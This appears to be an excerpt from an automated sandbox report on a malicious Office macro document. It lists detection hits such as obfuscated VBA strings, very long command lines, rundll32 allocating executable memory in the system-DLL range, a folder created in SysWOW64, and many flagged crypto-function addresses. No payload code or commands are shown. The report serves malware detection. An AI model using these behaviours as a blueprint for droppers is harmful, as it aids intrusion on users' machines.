Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String lwWhZGEasjsS
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String MiCjaGqJfPrI
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String KqVyuQQfwTWh
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String mehEFPFHcklgJDDx
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String wypNISsWSXthFJCq
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String LvnHAGHfIhRDBRAF
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String NeiIGCNWgICn
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String NisSEYrcDlKQUITa
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String nJJzFRjEWpRikxCD
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String oLweAMoGsqVE
Very long command line found
Source: unknown Process created: Commandline size = 5709
Source: unknown Process created: Commandline size = 5613
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 5613 Jump to behavior
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Gpnlsmsow\ Jump to behavior
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000976F 7_2_1000976F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0022B41F 7_2_0022B41F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00222C63 7_2_00222C63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00233895 7_2_00233895
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0022C0C6 7_2_0022C0C6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0022EE78 7_2_0022EE78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0022568E 7_2_0022568E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002302C3 7_2_002302C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002342DA 7_2_002342DA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00228736 7_2_00228736
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00227B63 7_2_00227B63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00234B41 7_2_00234B41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023340A 7_2_0023340A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023687F 7_2_0023687F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0022F444 7_2_0022F444
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0022E05A 7_2_0022E05A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023A0AF 7_2_0023A0AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002280BA 7_2_002280BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002260B9 7_2_002260B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002248BD 7_2_002248BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023889D 7_2_0023889D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002288E5 7_2_002288E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00221CFA 7_2_00221CFA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002320C5 7_2_002320C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00230D33 7_2_00230D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0022F536 7_2_0022F536
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0022153C 7_2_0022153C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00237D03 7_2_00237D03
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0022B112 7_2_0022B112
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023511B 7_2_0023511B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00235D1D 7_2_00235D1D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00238D1C 7_2_00238D1C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002269A0 7_2_002269A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00236DB9 7_2_00236DB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002361B8 7_2_002361B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00239586 7_2_00239586
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0022F98C 7_2_0022F98C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00227998 7_2_00227998
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00226D9F 7_2_00226D9F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002331E2 7_2_002331E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002371EF 7_2_002371EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00222A30 7_2_00222A30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00229A37 7_2_00229A37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00224A35 7_2_00224A35
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00237A0F 7_2_00237A0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00235A61 7_2_00235A61
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0022EA4C 7_2_0022EA4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002262A3 7_2_002262A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00221280 7_2_00221280
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002312E2 7_2_002312E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002326F5 7_2_002326F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002296CD 7_2_002296CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00238ADC 7_2_00238ADC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0022BB3A 7_2_0022BB3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00230F0C 7_2_00230F0C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00232B16 7_2_00232B16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00237F1F 7_2_00237F1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0022C769 7_2_0022C769
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00230B68 7_2_00230B68
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00231773 7_2_00231773
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0022E377 7_2_0022E377
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00228F78 7_2_00228F78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00225B79 7_2_00225B79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00239B45 7_2_00239B45
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00232349 7_2_00232349
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00238F49 7_2_00238F49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00226754 7_2_00226754
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0022B75F 7_2_0022B75F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002217AC 7_2_002217AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002373AC 7_2_002373AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023878F 7_2_0023878F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0022839D 7_2_0022839D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00233FE7 7_2_00233FE7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0022D7EB 7_2_0022D7EB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002367E9 7_2_002367E9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002363C1 7_2_002363C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00231BDF 7_2_00231BDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00229FDC 7_2_00229FDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002AB41F 8_2_002AB41F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002A2C63 8_2_002A2C63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002AEE78 8_2_002AEE78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002A568E 8_2_002A568E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002B3895 8_2_002B3895
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002B02C3 8_2_002B02C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002AC0C6 8_2_002AC0C6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002B42DA 8_2_002B42DA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002A8736 8_2_002A8736
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002A7B63 8_2_002A7B63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002B4B41 8_2_002B4B41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002B63C1 8_2_002B63C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002A2A30 8_2_002A2A30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002A9A37 8_2_002A9A37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002A4A35 8_2_002A4A35
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002B340A 8_2_002B340A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002B7A0F 8_2_002B7A0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002B5A61 8_2_002B5A61
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002B687F 8_2_002B687F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002AEA4C 8_2_002AEA4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002AF444 8_2_002AF444
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002AE05A 8_2_002AE05A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002BA0AF 8_2_002BA0AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002A62A3 8_2_002A62A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002A80BA 8_2_002A80BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002A60B9 8_2_002A60B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002A48BD 8_2_002A48BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002A1280 8_2_002A1280
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002B889D 8_2_002B889D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002B12E2 8_2_002B12E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002A88E5 8_2_002A88E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002A1CFA 8_2_002A1CFA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002B26F5 8_2_002B26F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002A96CD 8_2_002A96CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002B20C5 8_2_002B20C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002B8ADC 8_2_002B8ADC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002ABB3A 8_2_002ABB3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002A153C 8_2_002A153C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002B0D33 8_2_002B0D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002AF536 8_2_002AF536
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002B0F0C 8_2_002B0F0C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002B7D03 8_2_002B7D03
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002B511B 8_2_002B511B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002B7F1F 8_2_002B7F1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002B5D1D 8_2_002B5D1D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002B8D1C 8_2_002B8D1C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002AB112 8_2_002AB112
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002B2B16 8_2_002B2B16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002AC769 8_2_002AC769
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002B0B68 8_2_002B0B68
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002A8F78 8_2_002A8F78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002A5B79 8_2_002A5B79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002B1773 8_2_002B1773
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002AE377 8_2_002AE377
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002B2349 8_2_002B2349
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002B8F49 8_2_002B8F49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002B9B45 8_2_002B9B45
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002AB75F 8_2_002AB75F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002A6754 8_2_002A6754
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002A17AC 8_2_002A17AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002B73AC 8_2_002B73AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002A69A0 8_2_002A69A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002B6DB9 8_2_002B6DB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002B61B8 8_2_002B61B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002B878F 8_2_002B878F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002AF98C 8_2_002AF98C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002B9586 8_2_002B9586
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002A7998 8_2_002A7998
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002A6D9F 8_2_002A6D9F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002A839D 8_2_002A839D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002AD7EB 8_2_002AD7EB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002B67E9 8_2_002B67E9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002B71EF 8_2_002B71EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002B31E2 8_2_002B31E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002B3FE7 8_2_002B3FE7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002B1BDF 8_2_002B1BDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002A9FDC 8_2_002A9FDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006C2C63 9_2_006C2C63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006CEE78 9_2_006CEE78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006CB41F 9_2_006CB41F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006CC0C6 9_2_006CC0C6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006D02C3 9_2_006D02C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006D42DA 9_2_006D42DA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006C568E 9_2_006C568E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006D3895 9_2_006D3895
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006C7B63 9_2_006C7B63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006D4B41 9_2_006D4B41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006C8736 9_2_006C8736
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006D63C1 9_2_006D63C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006D5A61 9_2_006D5A61
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006D687F 9_2_006D687F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006CEA4C 9_2_006CEA4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006CF444 9_2_006CF444
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006CE05A 9_2_006CE05A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006C4A35 9_2_006C4A35
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006C9A37 9_2_006C9A37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006C2A30 9_2_006C2A30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006D7A0F 9_2_006D7A0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006D340A 9_2_006D340A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006C88E5 9_2_006C88E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006D12E2 9_2_006D12E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006C1CFA 9_2_006C1CFA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006D26F5 9_2_006D26F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006C96CD 9_2_006C96CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006D20C5 9_2_006D20C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006D8ADC 9_2_006D8ADC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006DA0AF 9_2_006DA0AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006C62A3 9_2_006C62A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006C48BD 9_2_006C48BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006C60B9 9_2_006C60B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006C80BA 9_2_006C80BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006C1280 9_2_006C1280
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006D889D 9_2_006D889D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006CC769 9_2_006CC769
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006D0B68 9_2_006D0B68
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006C8F78 9_2_006C8F78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006C5B79 9_2_006C5B79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006CE377 9_2_006CE377
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006D1773 9_2_006D1773
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006D2349 9_2_006D2349
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006D8F49 9_2_006D8F49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006D9B45 9_2_006D9B45
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006CB75F 9_2_006CB75F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006C6754 9_2_006C6754
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006C153C 9_2_006C153C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006CBB3A 9_2_006CBB3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006CF536 9_2_006CF536
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006D0D33 9_2_006D0D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006D0F0C 9_2_006D0F0C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006D7D03 9_2_006D7D03
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006D5D1D 9_2_006D5D1D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006D8D1C 9_2_006D8D1C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006D7F1F 9_2_006D7F1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006D511B 9_2_006D511B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006D2B16 9_2_006D2B16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006CB112 9_2_006CB112
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006D71EF 9_2_006D71EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006D67E9 9_2_006D67E9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006CD7EB 9_2_006CD7EB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006D3FE7 9_2_006D3FE7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006D31E2 9_2_006D31E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006C9FDC 9_2_006C9FDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006D1BDF 9_2_006D1BDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006C17AC 9_2_006C17AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006D73AC 9_2_006D73AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006C69A0 9_2_006C69A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006D6DB9 9_2_006D6DB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006D61B8 9_2_006D61B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006CF98C 9_2_006CF98C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006D878F 9_2_006D878F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006D9586 9_2_006D9586
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006C839D 9_2_006C839D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006C6D9F 9_2_006C6D9F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_006C7998 9_2_006C7998
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DB41F 10_2_001DB41F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DEE78 10_2_001DEE78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D2C63 10_2_001D2C63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E3895 10_2_001E3895
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D568E 10_2_001D568E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E42DA 10_2_001E42DA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DC0C6 10_2_001DC0C6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E02C3 10_2_001E02C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D8736 10_2_001D8736
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E4B41 10_2_001E4B41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D7B63 10_2_001D7B63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E63C1 10_2_001E63C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E7A0F 10_2_001E7A0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E340A 10_2_001E340A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D4A35 10_2_001D4A35
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D9A37 10_2_001D9A37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D2A30 10_2_001D2A30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DE05A 10_2_001DE05A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DEA4C 10_2_001DEA4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DF444 10_2_001DF444
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E687F 10_2_001E687F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E5A61 10_2_001E5A61
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E889D 10_2_001E889D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D1280 10_2_001D1280
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D48BD 10_2_001D48BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D60B9 10_2_001D60B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D80BA 10_2_001D80BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001EA0AF 10_2_001EA0AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D62A3 10_2_001D62A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E8ADC 10_2_001E8ADC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D96CD 10_2_001D96CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E20C5 10_2_001E20C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D1CFA 10_2_001D1CFA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E26F5 10_2_001E26F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D88E5 10_2_001D88E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E12E2 10_2_001E12E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E7F1F 10_2_001E7F1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E8D1C 10_2_001E8D1C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E5D1D 10_2_001E5D1D
